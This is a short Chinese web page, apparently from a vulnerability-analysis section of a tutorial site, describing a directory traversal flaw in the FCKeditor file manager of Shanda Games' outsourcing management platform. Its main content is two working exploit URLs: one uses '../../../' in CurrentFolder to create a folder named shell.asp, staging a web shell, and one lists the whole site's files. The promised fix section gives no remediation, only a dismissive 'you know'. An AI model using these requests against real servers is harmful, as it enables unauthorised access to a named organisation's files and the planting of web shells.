手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >盛大游戏外包管理平台FCK列全盘目路分析与解决方案
盛大游戏外包管理平台FCK列全盘目路分析与解决方案
摘要:修改CurrentFolder参数使用../../来进入不同的目录/browser/default/connectors/aspx/conn...

修改CurrentFolder 参数使用../../来进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

根据返回的XML 信息可以查看网站所有的目录。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

也可以直接浏览盘符:

盛大游戏外包管理平台FCK列全盘目路分析与解决方案1

盛大游戏外包管理平台FCK列全盘目路分析与解决方案2

修复方案:

你懂的!

【盛大游戏外包管理平台FCK列全盘目路分析与解决方案】相关文章:

优酷资源管理系统V1.0的设计缺陷的分析与解决方案

Ghost有漏洞 镜像恢复需小心陷阱

BBSXP绕过过滤继续注入漏洞分析

豆包网的搜索型盲注漏洞与分析及修复方案(图)

McAfee Framework存在远程格式串处理漏洞

BusinessObjects RptViewerAX ActiveX栈溢出漏洞

Belkin Wireless G Router绕过限制 拒绝服务漏洞

VMware产品存在权限提升拒绝服务安全漏洞

PunBB口令重置弱随机数绕过安全限制漏洞

Ewebeditor2.8.0最终版删除任意文件漏洞分析与解决方法

精品推荐
分类导航